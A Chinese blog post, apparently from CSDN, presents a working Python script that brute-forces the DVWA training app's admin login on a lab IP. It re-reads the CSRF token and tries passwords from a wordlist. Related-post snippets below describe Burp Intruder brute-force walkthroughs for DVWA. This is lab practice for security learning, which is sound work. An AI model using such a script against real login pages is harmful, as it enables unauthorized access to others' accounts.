【dvwa】--登陆页爆破

最新推荐文章于 2024-07-15 14:29:09 发布
最新推荐文章于 2024-07-15 14:29:09 发布
阅读量691 收藏 1
点赞数
分类专栏: 信息安全 Python 文章标签: python 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nicky_Zheng/article/details/108452138
版权

闲来无事,决定是不是Python爆破dvwa登陆界面
代码如下:

import datetime
import requests
from bs4 import BeautifulSoup

def Login_brute(filename):
    # 第一步,获取网页的csrf_token
    url = 'http://192.168.57.200/login.php'
    # 用于会话保持
    s = requests.Session()
    req = s.get(url)
    # 设置UA头
    heads = {'User-Agent': 'HAHA'}
    # 设置请求的编码
    req.encoding = 'UTF-8'
    html = req.text
    soup_texts = BeautifulSoup(html, 'lxml')
    # 获取csrf_token
    csrf_token = soup_texts.find('input', {'name': 'user_token'}).get('value')
    # 读取本地文件,获取爆破密码
    with open(filename, 'r') as p:
        for password in p.readlines():
            # 去除字符串2端的空格
            password = password.strip()
            # 用于提交的数据
            data = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
            # 创建请求
            req = s.post(url=url, headers=heads, data=data)
            # 对请求进行编码
            req.encoding = 'UTF-8'
            html = req.text
            # 登陆成功判断
            if 'Login failed' in html:
                soup_texts = BeautifulSoup(html, 'lxml')
                csrf_token = soup_texts.find('input', {'name': 'user_token'}).get('value')
                print("用户名:admin,密码:{}登录失败".format(password))
            else:
                print("用户名:admin,密码:{}登录成功".format(password))


if __name__ == '__main__':
    starttime = datetime.datetime.now()
    print("show time")
    Login_brute('pd.txt')
    endtime = datetime.datetime.now()
    # 记录爆破用时
    print("时间:", (endtime - starttime).seconds)
d41b
关注
专栏目录
DVWA入门篇-用burp爆破登录
一阵风飘过的博客
11-19 977
本人菜鸟,水平有限,写的有点烂,网友见谅 1. 打开DVWA登录 2. 开启burp代理,输入参数抓包 3. 进入instruder界面 首先点击clear§ 清除所有攻击向量,然后双击password的值,点击add§, 这里是单个参数,我们选择sniper的攻击模式 配置Payloads,选择Payload type ->simple list , 然后加载密码字典列表 4. 开始爆破 双击start attack 按钮,开始爆破 发现所有请求都是302重定向,这里需要重定向跟随,其.
DVWA】--- 一、暴破(BruteForce)
qq_43168364的博客
05-31 1451
BruteForce 一、low 在登录时使用bp进行抓包 将抓到的包发送到Intruder模块。设置需要爆破的参数,和爆破的类型。 这里爆破的类型一共有四种: sniper:一个字典,先匹配第一项再匹配第二项。 Battering ram:一个字典,同用户名同密码匹配。 Pitchfork:两个字典,同行匹配,短的截至。 Cluster bomb:两个字典,交叉匹配所有可能。 一般建议......
dvwa中的爆破
无痕的博客
01-16 1267
演示dvwa环境中的brute Force
网络安全 DVWA通关指南 DVWA Brute Force (爆破)
最新发布
YueXuan_521的博客
07-15 937
网络安全 DVWA通关指南 DVWA Brute Force ( DVWA Brute Force (爆破) 文章目录 DVWA Brute Force (爆破) Low Medium High Impossible遍历,只是一个选字典1,一个选字典2(相当于50m赛跑同时出发,只是赛道不同,互不干扰。2、密码验证方面,增加验证失败睡眠两秒的限制,这会加大爆破所需要的时间。但只要时间充足,爆破出密码不是问题。使用字典进行爆破,字典可以自己制作,也可以网上直接下载,等待片刻爆破完成,使用爆破出的密码就能登录。
DVWA_HIGH_爆破
weixin_44058630的博客
12-30 427
首先我们打开burp和firefox设置好代理。 然后登录dvwa设置等级为high,在burp中开启拦截,然后回到firefox中输入正确的用户名以及错误的密码: 然后点击login以后,burp中就抓取到了你登录请求的数据包: 右键将其发送至intruder模块: 先点击清楚clear,然后再将password字段以及usertoken字段add,然后再将password字段以及user_token字段add,然后再将password字段以及usert​oken字段add,并将其设置为pitchf
DVWA-写给自己看的傻瓜式教程
qq_39283174的博客
10-17 2626
下载PHPstudy ->官网下载 下载DVWA ->官网下载64位版本 ->将压缩包解压在PHP study的WWW文件目录下 ->将DVWA-master下config下的文件改名为config.inc.php ->将文件中密码改为root 配置DVWA ->打开http://localhost/dvwa-master/setup.php ->点击c...
DVWA---暴力破解模块全等级源码分析
xj28555的博客
06-27 1419
1.简介 什么叫暴力破解,暴力破解又叫枚举法。在进行归纳推理时,如果逐个考察了某类事件的所有可能情况,因而得出一般结论,那么这结论是可靠的,这种归纳方法叫做枚举法。通俗的讲就是一个一个去试,但不是人手动的去试,而是利用工具。 2.工具 用Burpsiute的intruder模块进行暴力破解 Intruder的配置参数大家可以参考 3.DVWA靶场练习 ①low等级 查看low等级源代码 没有做任何放爆破措施,而且get过来的参数没有做任何过滤直接拼接到查询语句中则此处还存在sql注入中万
DVWA-BruteFoce高级安全
R4bbit
06-24 272
DVWA:security=high GET包结构 比起来之前low,medium等级,可以看到这里多了一个参数,user_token,为了防止暴力破解加了一个token的验证,这种应该属于多重验证,但是明显能看出来user_token就是用户输入密码的md5形式,直接用burpsutie中Payload Processing处理下就OK了 如果不知道token是用的什么加密算法,就从前端中去寻找,这里发现了一个hidden的隐藏域 ...
dvwa-简单版
lwbcsd的博客
01-25 790
Brute Force(Low) 从面中可以看出这是一个输入账户和密码题。 方法一 用burp进行暴力破解 方法二 看面是否有sql注入,显然这个面是存在sql注入的。
DVWA--Brute Force(暴力破解)
weixin_50342860的博客
08-19 190
目录风险mediumhigh修复 风险 在不知道用户的账号和密码的情况下,通过自动化工具或者强大的字典去进行连续性尝试,去碰撞出一些有效的账号密码,一般用来破解后台管理系统的登录。 medium 将DVWA的级别调为Medium后,进入Brute Force 输入一个账号与密码,使用burp进行抓包 右击发送到 intruder模块,将账号与密码设为变量,爆破模式选为Cluster bomb 在 Payloads 中,Payload set 选择使用 Simple list ,将用户字典和密码字典分别添加
使用Python脚本学习DVWA-Brute Force(爆破
weixin_43838889的博客
04-22 1358
使用Python脚本学习DVWABrute Force(爆破)LowPython 脚本密码字典文件执行结果修改后脚本:执行结果 Brute Force(爆破) 本文全程参考[https://blog.csdn.net/zy15667076526/article/details/109705286?utm_medium=distribute.pc_relevant.none-task-blog-baidujs_baidulandingword-0]向该博主致谢(https://blog.csdn.net/zy
OWASP ZAP 暴力破解 DVWA 登录用户名密码
mixboot
03-25 6005
1,系统环境 $ sw_vers ProductName: Mac OS X ProductVersion: 10.13.6 BuildVersion: 17G65 2,ZAP下载地址 ZAP Windows Linux MacOS 下载
DVWA暴力破解-实验
weixin_54961753的博客
04-27 1077
首先可以对password和user_token两个参数进行暴力破解,选用burp的intruder模块,设置两个参数 password和user_token为变量,攻击类型选择pitchfork,意思是草叉模式(Pitchfork )——它可以使用多组Payload集合,在每一个不同的Payload标志位置上(最多20个),遍历所有的Payload。Medium关卡的攻击在防暴力破解方面,源码增加了 sleep(2) 的操作,当输错用户名密码之后,会延迟一段时间再返回登录失败的结果。
DVWA------暴力破解(全级别详解)
热门推荐
weixin_50339832的博客
05-26 1万+
DVWA安装教程: https://www.cnblogs.com/lsdb/p/6826519.html Brute Force(暴力破解) 两个字:撞库 三个字:枚举法 暴力破解的意思是攻击者借助计算机的高速计算不停枚举所有可能的用户名和密码,直到尝试出正确的组合,成功登录系统。 理论上,只要字典足够大,破解总是会成功的。 阻止暴力破解的最有效方式是设置复杂的密码(英文字母大小写、数字、符号混合)。 而如果你的字典是从某网站泄露出来的,你使用它试图登陆其他网站,就便是撞库。撞库攻击的成功率高于暴力破解,
Dvwa-暴力破解
Have_a_great_day的博客
12-17 1834
初次搭建Dvwa靶场,默认输入账号Username–【admin】、密码Password–【password】,登陆界面。添加狐狸代理。因为之前做过了,就把之前留的图片放到这里了。kali自带Firefox,按照下图步骤做添加狐狸代理搜索fox,选择如下图fox,点击进入没有安装的话,点击添加那么就添加成功,然后再点击添加,然后狐狸代理就弄好了于是在菜单栏中会显示,点击添加输入ip和端口后,点击保存。利用新工具,点击kali左上角搜索【burpsuit】打开,会弹出如下图,直接点击下一步。
DVWA爆破模块学习
qq_50495562的博客
04-01 3630
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、low级别1.爆破2.sql注入二、medium级别三、high级别四、impossible级别总结 前言 暴力破解brute Force 一般指穷举法,基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕,比如猜解账号密码,撞库等。使用burpsuite进行暴力猜解。 一、low级别 1.爆破 操作步骤: 首先审计代码。 代码在phpstudy_pro\WWW\DV.
DVWA【暴力破解】详解
m0_58213960的博客
02-08 1822
DVWA【暴力破解】详解
DVWA靶场-Brute Force暴力破解~保姆级教程!!!
2301_77360738的博客
05-09 3351
DVWA靶场初体验,超简单的暴力破解!!!
dvwa-master zip
07-28
dvwa-master zip是一个开源的漏洞脆弱性应用程序,用于进行网络安全测试和漏洞扫描。 具体而言,dvwa-master zip是一个基于PHP和MySQL开发的靶场平台,旨在帮助用户了解和学习网络安全漏洞。它模拟了多种常见的Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值